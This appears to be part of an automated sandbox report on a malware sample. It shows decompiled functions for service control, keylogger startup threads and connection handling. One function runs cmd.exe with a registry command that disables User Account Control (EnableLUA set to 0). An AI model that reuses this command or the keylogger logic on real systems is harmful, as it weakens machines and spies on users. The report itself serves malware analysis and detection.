                      							if(_t31 == 0) {
                      								goto L9;
                      							} else {
                      								goto L8;
                      							}
                      						} else {
                      							_push(_t31);
                      							goto L4;
                      						}
                      					} else {
                      						_push(_t3);
                      						L4:
                      						E007801F5();
                      						_pop(_t25);
                      						L9:
                      						SetLastError(_t36);
                      						E0077F949(_t20, _t29, _t31, _t36);
                      						asm("int3");
                      						_push(_t20);
                      						_push(_t36);
                      						_push(_t31);
                      						_t37 = GetLastError();
                      						_t21 = 0;
                      						_t9 =  *0x7aa1e0; // 0x6
                      						_t45 = _t9 - 0xffffffff;
                      						if(_t9 == 0xffffffff) {
                      							L12:
                      							_t32 = E0077F348(_t25, 1, 0x364);
                      							_pop(_t27);
                      							if(_t32 != 0) {
                      								_t11 = E007822DF(_t27, _t37, __eflags,  *0x7aa1e0, _t32);
                      								__eflags = _t11;
                      								if(_t11 != 0) {
                      									E00781B54(_t27, _t32, 0x7ab654);
                      									E007801F5(_t21);
                      									__eflags = _t32;
                      									if(_t32 != 0) {
                      										goto L19;
                      									} else {
                      										goto L18;
                      									}
                      								} else {
                      									_push(_t32);
                      									goto L14;
                      								}
                      							} else {
                      								_push(_t21);
                      								L14:
                      								E007801F5();
                      								L18:
                      								SetLastError(_t37);
                      							}
                      						} else {
                      							_t32 = E00782289(_t25, _t37, _t45, _t9);
                      							if(_t32 != 0) {
                      								L19:
                      								SetLastError(_t37);
                      								_t21 = _t32;
                      							} else {
                      								goto L12;
                      							}
                      						}
                      						return _t21;
                      					}
                      				} else {
                      					_t31 = E00782289(_t23, _t36, _t42, _t2);
                      					if(_t31 != 0) {
                      						L8:
                      						SetLastError(_t36);
                      						return _t31;
                      					} else {
                      						goto L2;
                      					}
                      				}
                      			}

                      0x00781ce2
                      0x00781ce2
                      0x00781ce2
                      0x00781cec
                      0x00781cee
                      0x00781cf3
                      0x00781cf6
                      0x00781d04
                      0x00781d0b
                      0x00781d10
                      0x00781d13
                      0x00781d16
                      0x00781d28
                      0x00781d2d
                      0x00781d2f
                      0x00781d3a
                      0x00781d41
                      0x00781d46
                      0x00781d49
                      0x00781d4b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00781d31
                      0x00781d31
                      0x00000000
                      0x00781d31
                      0x00781d18
                      0x00781d18
                      0x00781d19
                      0x00781d19
                      0x00781d1e
                      0x00781d59
                      0x00781d5a
                      0x00781d60
                      0x00781d65
                      0x00781d68
                      0x00781d69
                      0x00781d6a
                      0x00781d71
                      0x00781d73
                      0x00781d75
                      0x00781d7a
                      0x00781d7d
                      0x00781d8b
                      0x00781d97
                      0x00781d9a
                      0x00781d9d
                      0x00781daf
                      0x00781db4
                      0x00781db6
                      0x00781dc1
                      0x00781dc7
                      0x00781dcf
                      0x00781dd1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00781db8
                      0x00781db8
                      0x00000000
                      0x00781db8
                      0x00781d9f
                      0x00781d9f
                      0x00781da0
                      0x00781da0
                      0x00781dd3
                      0x00781dd4
                      0x00781dd4
                      0x00781d7f
                      0x00781d85
                      0x00781d89
                      0x00781ddc
                      0x00781ddd
                      0x00781de3
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00781d89
                      0x00781dea
                      0x00781dea
                      0x00781cf8
                      0x00781cfe
                      0x00781d02
                      0x00781d4d
                      0x00781d4e
                      0x00781d58
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00781d02

                      APIs
                      • GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
                      • _free.LIBCMT ref: 00781D19
                      • _free.LIBCMT ref: 00781D41
                      • SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D4E
                      • SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
                      • _abort.LIBCMT ref: 00781D60
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: 6b9689908ae0b2732b99c1b6ed014a60d28a4cfcfeaba439ffdc379262bac28f
                      • Instruction ID: 663d22bdfab203caddd8751a2f1449f4cb616c60feb64a328a1ded6306c37f1c
                      • Opcode Fuzzy Hash: 6b9689908ae0b2732b99c1b6ed014a60d28a4cfcfeaba439ffdc379262bac28f
                      • Instruction Fuzzy Hash: F9F0A43A2C0501F6C7123378AC0DF6E162DABD2771B654125F618D2192EF2C89034375
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0075640B(char _a4) {
                      				struct _SERVICE_STATUS _v32;
                      				signed int _t16;
                      				void* _t19;
                      				void* _t20;
                      
                      				_t16 = 0;
                      				_t20 = OpenSCManagerW(0, 0, 0x20);
                      				_t19 = OpenServiceW(_t20, E00741EEB( &_a4), 0x20);
                      				if(_t19 != 0) {
                      					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
                      					CloseServiceHandle(_t20);
                      					CloseServiceHandle(_t19);
                      				} else {
                      					CloseServiceHandle(_t20);
                      				}
                      				E00741EF0();
                      				return _t16;
                      			}

                      0x00756416
                      0x00756425
                      0x00756434
                      0x00756438
                      0x00756459
                      0x0075645c
                      0x0075645f
                      0x0075643a
                      0x0075643b
                      0x0075643b
                      0x00756464
                      0x00756471

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00755FB6,00000000), ref: 0075641A
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00755FB6,00000000), ref: 0075642E
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755FB6,00000000), ref: 0075643B
                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00755FB6,00000000), ref: 0075644A
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755FB6,00000000), ref: 0075645C
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755FB6,00000000), ref: 0075645F
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: efb38c66dcebdb62811ea0330e8121bc7ce8da34cc694b15c4a780ef209f7f93
                      • Instruction ID: 55bfa193a4a68a7e2d00efc1672a1701cb86d279970cb5c03f4b116b4c128bbc
                      • Opcode Fuzzy Hash: efb38c66dcebdb62811ea0330e8121bc7ce8da34cc694b15c4a780ef209f7f93
                      • Instruction Fuzzy Hash: E7F0F6355402287BD610BBA89C8ADBF3B6DDB45751F404016FD0583141EF6C8F4696F5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00756576(char _a4) {
                      				struct _SERVICE_STATUS _v32;
                      				signed int _t16;
                      				void* _t19;
                      				void* _t20;
                      
                      				_t16 = 0;
                      				_t20 = OpenSCManagerW(0, 0, 0x40);
                      				_t19 = OpenServiceW(_t20, E00741EEB( &_a4), 0x40);
                      				if(_t19 != 0) {
                      					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
                      					CloseServiceHandle(_t20);
                      					CloseServiceHandle(_t19);
                      				} else {
                      					CloseServiceHandle(_t20);
                      				}
                      				E00741EF0();
                      				return _t16;
                      			}

                      0x00756581
                      0x00756590
                      0x0075659f
                      0x007565a3
                      0x007565c4
                      0x007565c7
                      0x007565ca
                      0x007565a5
                      0x007565a6
                      0x007565a6
                      0x007565cf
                      0x007565dc

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00755EB6,00000000), ref: 00756585
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00755EB6,00000000), ref: 00756599
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755EB6,00000000), ref: 007565A6
                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00755EB6,00000000), ref: 007565B5
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755EB6,00000000), ref: 007565C7
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755EB6,00000000), ref: 007565CA
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: c87f052c28fd1bf1da9e57900dd26b2e832c814b5e3b35c312df4af5affad46a
                      • Instruction ID: a5aa1cef5ca3cbf42d97f9605291479df3f8e3a382eeb3b1ac4e2f6877fdf316
                      • Opcode Fuzzy Hash: c87f052c28fd1bf1da9e57900dd26b2e832c814b5e3b35c312df4af5affad46a
                      • Instruction Fuzzy Hash: 3AF0F6355401287BD610BBA8AC49EBF3B6DDB45251F404016FE0993141EF6C8F4A96F4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E0075BD19(short* __edx) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				short* _v16;
                      				short _v20;
                      				char _v24;
                      				intOrPtr _v28;
                      				char _v80;
                      				void* _t45;
                      				void* _t48;
                      				void* _t59;
                      				intOrPtr _t62;
                      				void* _t64;
                      				intOrPtr _t65;
                      				void* _t67;
                      				char _t68;
                      				char _t69;
                      				char* _t70;
                      				signed int _t71;
                      				short* _t72;
                      				signed int _t76;
                      				char* _t79;
                      				char* _t81;
                      				intOrPtr _t82;
                      				char* _t85;
                      				void* _t86;
                      				void* _t89;
                      				intOrPtr _t91;
                      				char* _t92;
                      				intOrPtr* _t93;
                      				void* _t95;
                      				void* _t96;
                      				void* _t97;
                      				void* _t98;
                      
                      				_v16 = __edx;
                      				_v8 = _v8 & 0;
                      				_v20 = 0;
                      				_v12 = 0;
                      				_v24 = 0;
                      				_v28 = E0074BAB9();
                      				_t85 = "TLS_AES_128_GCM_SHA256";
                      				if(__edx == 0) {
                      					L37:
                      					return 0;
                      				}
                      				_t45 = E00779510(_t85, "ALL", 3);
                      				_t97 = _t96 + 0xc;
                      				if(_t45 == 0) {
                      					L36:
                      					return 1;
                      				}
                      				_t48 = E00779510(_t85, "DEFAULT", 7);
                      				_t98 = _t97 + 0xc;
                      				if(_t48 == 0) {
                      					goto L36;
                      				} else {
                      					goto L3;
                      				}
                      				do {
                      					L3:
                      					_t70 = _t85;
                      					_t86 = E007717E0(_t85, 0x7a57f0);
                      					if(_t86 != 0) {
                      						_t76 = _t86 - _t70;
                      						L8:
                      						if(_t76 <= 0x31) {
                      							if(_t86 != 0) {
                      								_t89 = _t86 - _t70;
                      								L15:
                      								E0077BCD0( &_v80, _t70, _t89);
                      								_t98 = _t98 + 0xc;
                      								_t11 = _t89 - 1; // -1
                      								_t90 =  ==  ? _t11 : _t89;
                      								_t71 = 0;
                      								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
                      								if(_v28 <= 0) {
                      									L20:
                      									_t72 = _v16;
                      									_t91 = _v12;
                      									goto L21;
                      								}
                      								_t93 = 0x7a0830;
                      								while(1) {
                      									_t15 = _t93 - 4; // 0x7a5d50
                      									_t59 = E00779510( &_v80,  *_t15, 0x31);
                      									_t98 = _t98 + 0xc;
                      									if(_t59 == 0) {
                      										break;
                      									}
                      									_t67 = E00779510( &_v80,  *_t93, 0x31);
                      									_t98 = _t98 + 0xc;
                      									if(_t67 == 0) {
                      										break;
                      									}
                      									_t71 = _t71 + 1;
                      									_t93 = _t93 + 0xc;
                      									if(_t71 < _v28) {
                      										continue;
                      									}
                      									goto L20;
                      								}
                      								_t82 = _v20;
                      								if(_t82 >= 0x12b) {
                      									goto L37;
                      								}
                      								_t76 = _t71 * 0xc;
                      								_t72 = _v16;
                      								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x7a0834));
                      								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x7a0835));
                      								_t62 =  *((intOrPtr*)(_t76 + 0x7a0834));
                      								_v20 = _t82 + 2;
                      								if(_t62 == 0x13) {
                      									L34:
                      									_v8 = 1;
                      									L35:
                      									_t91 = 1;
                      									_v12 = 1;
                      									goto L21;
                      								}
                      								if(_t62 != 0xc0) {
                      									L30:
                      									if(_v8 != 0) {
                      										L32:
                      										if(_v24 == 0) {
                      											_v24 = 1;
                      										}
                      										goto L35;
                      									}
                      									_t64 = E007717E0( &_v80, "ECDSA");
                      									_pop(_t76);
                      									if(_t64 != 0) {
                      										goto L34;
                      									}
                      									goto L32;
                      								}
                      								_t65 =  *((intOrPtr*)(_t76 + 0x7a0835));
                      								if(_t65 == 0xb4 || _t65 == 0xb5) {
                      									goto L34;
                      								} else {
                      									goto L30;
                      								}
                      							}
                      							_t92 = _t70;
                      							_t76 =  &(_t92[1]);
                      							do {
                      								_t68 =  *_t92;
                      								_t92 =  &(_t92[1]);
                      							} while (_t68 != 0);
                      							_t89 = _t92 - _t76;
                      							goto L15;
                      						}
                      						_t89 = 0x31;
                      						goto L15;
                      					}
                      					_t79 = _t70;
                      					_t81 =  &(_t79[1]);
                      					do {
                      						_t69 =  *_t79;
                      						_t79 =  &(_t79[1]);
                      					} while (_t69 != 0);
                      					_t76 = _t79 - _t81;
                      					goto L8;
                      					L21:
                      					_t85 = _t86 + 1;
                      				} while (_t86 != 0);
                      				if(_t91 != 0) {
                      					_push(_t76);
                      					 *_t72 = _v20;
                      					 *((char*)(_t72 + 0x154)) = 1;
                      					E00759333(_t72, _v8, _v24, _t76, 1);
                      				}
                      				return _t91;
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _strncpy
                      • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                      • API String ID: 2961919466-1012175531
                      • Opcode ID: 9f0653855b492c7cd726e61da8c9e458e8fb82a5746e5e3f390b4cf59a3da99c
                      • Instruction ID: 1498ca1f8cb19c5984cfdb33493d9fe8633281324231764b9a39b79ce86928c1
                      • Opcode Fuzzy Hash: 9f0653855b492c7cd726e61da8c9e458e8fb82a5746e5e3f390b4cf59a3da99c
                      • Instruction Fuzzy Hash: DA513631E04219DBDF20CEA88886BFEBBB49F41301F188569DE44A7286E7BD4D09C7D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 84%
                      			E00748742(void* __ecx, char _a4) {
                      				char _v28;
                      				char _v32;
                      				void* _v56;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t21;
                      				void* _t39;
                      				signed int _t41;
                      				void* _t43;
                      
                      				_t43 = (_t41 & 0xfffffff8) - 0x1c;
                      				_push(_t21);
                      				_t39 = __ecx;
                      				_t2 = _t39 + 0x60; // 0x7ac3b0
                      				 *((char*)(__ecx + 0x49)) = 1;
                      				E00749DD2(_t2,  &_a4);
                      				_t47 =  *0x7aa9d4 - 0x32;
                      				_t35 = "Offline Keylogger Started";
                      				if( *0x7aa9d4 != 0x32) {
                      					E00742084(_t21,  &_v28, "Offline Keylogger Started");
                      					_t43 = _t43 - 0x18;
                      					E007572DA(_t43,  &_v32);
                      					E00749634(_t21, _t39, _t47);
                      					E00741FC7();
                      				}
                      				_t44 = _t43 - 0x18;
                      				E00742084(_t21, _t43 - 0x18, _t35);
                      				E00742084(_t21, _t44 - 0x18, "[Info]");
                      				E00756C80(_t21, _t35);
                      				CreateThread(0, 0, 0x74884b, _t39, 0, 0);
                      				if( *_t39 == 0) {
                      					CreateThread(0, 0, E00748830, _t39, 0, 0);
                      				}
                      				CreateThread(0, 0, E0074885A, _t39, 0, 0);
                      				return E00741EF0();
                      			}

                      APIs
                      • CreateThread.KERNEL32 ref: 007487CA
                      • CreateThread.KERNEL32 ref: 007487DA
                      • CreateThread.KERNEL32 ref: 007487E6
                        • Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
                        • Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
                        • Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CreateThread$EventLocalTimewsprintf
                      • String ID: Offline Keylogger Started$[Info]
                      • API String ID: 3534694722-3531117058
                      • Opcode ID: 1d12097ec88fc237a66b1515910db305df5a56e78d46a6e1fdbfb9b94dde8146
                      • Instruction ID: 970bc5d28debbdeccc286f50e64b8b89c177e841dd476b9cf223315373236104
                      • Opcode Fuzzy Hash: 1d12097ec88fc237a66b1515910db305df5a56e78d46a6e1fdbfb9b94dde8146
                      • Instruction Fuzzy Hash: 8E11A7A120020C7ED214B7749CCACBF3A5CDA82394B84062DF94552193EF6C5D59C6F3
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E007493AD(void* __ecx) {
                      				char _v28;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t7;
                      				void* _t18;
                      				void* _t30;
                      				void* _t31;
                      				void* _t32;
                      
                      				_t30 = __ecx;
                      				_t36 =  *((char*)(__ecx + 0x4a));
                      				if( *((char*)(__ecx + 0x4a)) == 0) {
                      					_t28 = "Online Keylogger Started";
                      					 *((char*)(__ecx + 0x4a)) = 1;
                      					E00742084(_t18,  &_v28, "Online Keylogger Started");
                      					_t32 = _t31 - 0x18;
                      					E007572DA(_t32,  &_v28);
                      					E00749634(_t18, _t30, _t36);
                      					E00741FC7();
                      					_t33 = _t32 - 0x18;
                      					E00742084(_t18, _t32 - 0x18, "Online Keylogger Started");
                      					E00742084(_t18, _t33 - 0x18, "[Info]");
                      					E00756C80(_t18, _t28);
                      					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
                      						if( *_t30 == 0) {
                      							CreateThread(0, 0, E00748830, _t30, 0, 0);
                      						}
                      						CreateThread(0, 0, E0074885A, _t30, 0, 0);
                      					}
                      					return CreateThread(0, 0, E00748869, _t30, 0, 0);
                      				}
                      				return _t7;
                      			}

                      APIs
                        • Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
                        • Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
                        • Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED
                        • Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A
                      • CreateThread.KERNEL32 ref: 0074942D
                      • CreateThread.KERNEL32 ref: 00749439
                      • CreateThread.KERNEL32 ref: 00749445
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CreateThread$LocalTime$Eventwsprintf
                      • String ID: Online Keylogger Started$[Info]
                      • API String ID: 3546759147-3401407043
                      • Opcode ID: df0045e7a08d32bb7b8cf5bc9308d4e79fceb10d77ceba8aaedbdb6a74996313
                      • Instruction ID: 31b71dd860b271081ce0e918c7d1d86ba25c454626c11a63ba176f22103c1b28
                      • Opcode Fuzzy Hash: df0045e7a08d32bb7b8cf5bc9308d4e79fceb10d77ceba8aaedbdb6a74996313
                      • Instruction Fuzzy Hash: 7801C49170124C7AE62072798C8ADBF7A6CDA82394F80056DFA4112142DE6D1C5A82F2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 70%
                      			E00758DDA() {
                      				char _v20;
                      				struct _WNDCLASSEXA _v68;
                      				void* __edi;
                      				struct HWND__* _t20;
                      				void* _t23;
                      
                      				E00771F00(_t23,  &(_v68.style), 0, 0x2c);
                      				_v68.cbSize = 0x30;
                      				_v68.style = 0;
                      				_v68.lpfnWndProc = E00758E5A;
                      				_v68.cbClsExtra = 0;
                      				asm("movsd");
                      				_v68.lpszClassName =  &_v20;
                      				_v68.cbWndExtra = 0;
                      				asm("movsd");
                      				_v68.lpszMenuName = 0;
                      				asm("movsd");
                      				asm("movsw");
                      				asm("movsb");
                      				if(RegisterClassExA( &_v68) == 0) {
                      					L3:
                      					return 0;
                      				}
                      				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                      				if(_t20 == 0) {
                      					GetLastError();
                      					goto L3;
                      				}
                      				return _t20;
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ClassCreateErrorLastRegisterWindow
                      • String ID: 0$MsgWindowClass
                      • API String ID: 2877667751-2410386613
                      • Opcode ID: 5d8058c4c72b193a4acec3e296f18db215c2cacd615739cd6f72dd7ead0556f4
                      • Instruction ID: 04715daf3ba670f339ec2f39534b2f0bcf9a13b1b7054e214ba2cbae51784e61
                      • Opcode Fuzzy Hash: 5d8058c4c72b193a4acec3e296f18db215c2cacd615739cd6f72dd7ead0556f4
                      • Instruction Fuzzy Hash: 1B01E9B190021DABDB00DF95AC859EFBBBCFB05795B40452AF914A6240EBB45A058BA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 19%
                      			E00772D11(void* __ebx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                      				void* __edi;
                      				void* __ebp;
                      				intOrPtr _t24;
                      				void* _t26;
                      				void* _t27;
                      				void* _t28;
                      				intOrPtr _t29;
                      				intOrPtr* _t31;
                      				void* _t33;
                      
                      				_t28 = __edx;
                      				_t26 = __ebx;
                      				_t35 = _a28;
                      				_t29 = _a8;
                      				if(_a28 != 0) {
                      					_push(_a28);
                      					_push(_a24);
                      					_push(_t29);
                      					_t5 =  &_a4; // 0x77313d
                      					_push( *_t5);
                      					E00773360(_t35);
                      					_t33 = _t33 + 0x10;
                      				}
                      				_t36 = _a40;
                      				_t7 =  &_a4; // 0x77313d
                      				_push( *_t7);
                      				if(_a40 != 0) {
                      					_push(_a40);
                      				} else {
                      					_push(_t29);
                      				}
                      				E007722EB(_t27);
                      				_t31 = _a32;
                      				_push( *_t31);
                      				_push(_a20);
                      				_push(_a16);
                      				_push(_t29);
                      				E00773562(_t26, _t27, _t28, _t29, _t36);
                      				_push(0x100);
                      				_push(_a36);
                      				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                      				_t24 = _a24;
                      				_push( *((intOrPtr*)(_t24 + 0xc)));
                      				_push(_a20);
                      				_push(_a12);
                      				_push(_t29);
                      				_push(_a4);
                      				"j8hH~z"();
                      				if(_t24 != 0) {
                      					E007722B9(_t24, _t29);
                      					return _t24;
                      				}
                      				return _t24;
                      			}

                      APIs
                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00772D28
                        • Part of subcall function 00773360: ___AdjustPointer.LIBCMT ref: 007733AA
                      • _UnwindNestedFrames.LIBCMT ref: 00772D3F
                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00772D51
                      • CallCatchBlock.LIBVCRUNTIME ref: 00772D75
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                      • String ID: =1w
                      • API String ID: 2633735394-3687730428
                      • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                      • Instruction ID: 484afa0c5f0e79305fe37215b07ae019e00287aa7cf818e9e2e0076281fde449
                      • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                      • Instruction Fuzzy Hash: 1901E932100109FBCF225F55CC05EDA3BBAFF58794F158514F96C66122D73AE962EBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 50%
                      			E0074D3F7() {
                      				struct _PROCESS_INFORMATION _v20;
                      				struct _STARTUPINFOA _v92;
                      				void* __edi;
                      				void* _t17;
                      				long _t19;
                      
                      				_t19 = 0x44;
                      				E00771F00(_t17,  &_v92, 0, _t19);
                      				_v92.cb = _t19;
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
                      				CloseHandle(_v20);
                      				return CloseHandle(_v20.hThread);
                      			}

                      APIs
                      • CreateProcessA.KERNEL32 ref: 0074D43B
                      • CloseHandle.KERNEL32(0074C5FB), ref: 0074D44A
                      • CloseHandle.KERNEL32(00000027), ref: 0074D44F
                      Strings
                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0074D431
                      • C:\Windows\System32\cmd.exe, xrefs: 0074D436
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CloseHandle$CreateProcess
                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                      • API String ID: 2922976086-4183131282
                      • Opcode ID: f7888bb3ce6fa2087883137582da7e9ae6d2d6a358bdbcd3f1496efe397cec16
                      • Instruction ID: 73ec29cfc7ecce6bf31d04d572385959fba51b1f72e84a42497c74eb7f6be7d9
                      • Opcode Fuzzy Hash: f7888bb3ce6fa2087883137582da7e9ae6d2d6a358bdbcd3f1496efe397cec16
                      • Instruction Fuzzy Hash: 3DF090B290012C7EEB00ABE9EC85EEFBF7CEB88795F000522F604E2010D5306D148BE5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E0074519B(void* __ecx, void* __edi) {
                      				void* __ebx;
                      				long _t19;
                      				intOrPtr _t28;
                      				void* _t29;
                      				void* _t30;
                      				void* _t31;
                      				intOrPtr _t38;
                      
                      				_t29 = __edi;
                      				_t30 = __ecx;
                      				 *((intOrPtr*)(__ecx + 0x60)) = 0;
                      				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
                      					L3:
                      					 *((char*)(_t30 + 0x50)) = 0;
                      					_t38 =  *0x7abb03; // 0x0
                      					if(_t38 != 0) {
                      						_t32 = _t31 - 0x18;
                      						E00742084(0, _t31 - 0x18, "Connection timeout");
                      						E00742084(0, _t32 - 0x18, "[WARNING]");
                      						E00756C80(0, _t29);
                      					}
                      					E00744E0B(_t30);
                      					return 1;
                      				} else {
                      					goto L1;
                      				}
                      				while(1) {
                      					L1:
                      					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
                      					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
                      					_t28 =  *((intOrPtr*)(_t30 + 0x60));
                      					if(_t19 == 0) {
                      						break;
                      					}
                      					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
                      						continue;
                      					}
                      					goto L3;
                      				}
                      				CloseHandle( *(_t30 + 0x54));
                      				 *(_t30 + 0x54) = 0;
                      				 *((char*)(_t30 + 0x50)) = 0;
                      				SetEvent( *(_t30 + 0x58));
                      				return 0;
                      			}

                      APIs
                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00745196), ref: 007451B1
                      • CloseHandle.KERNEL32(?), ref: 00745207
                      • SetEvent.KERNEL32(?), ref: 00745216
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: CloseEventHandleObjectSingleWait
                      • String ID: Connection timeout$[WARNING]
                      • API String ID: 2055531096-1470507543
                      • Opcode ID: fbd6103d4cd2e0f5263852445a5d8a3cd223ee9a38f2474032305894be6a5d11
                      • Instruction ID: 8eea2894264d2ae0f00827e3690811f627b8dc40b0fc21cd69b4f97caafc3e95
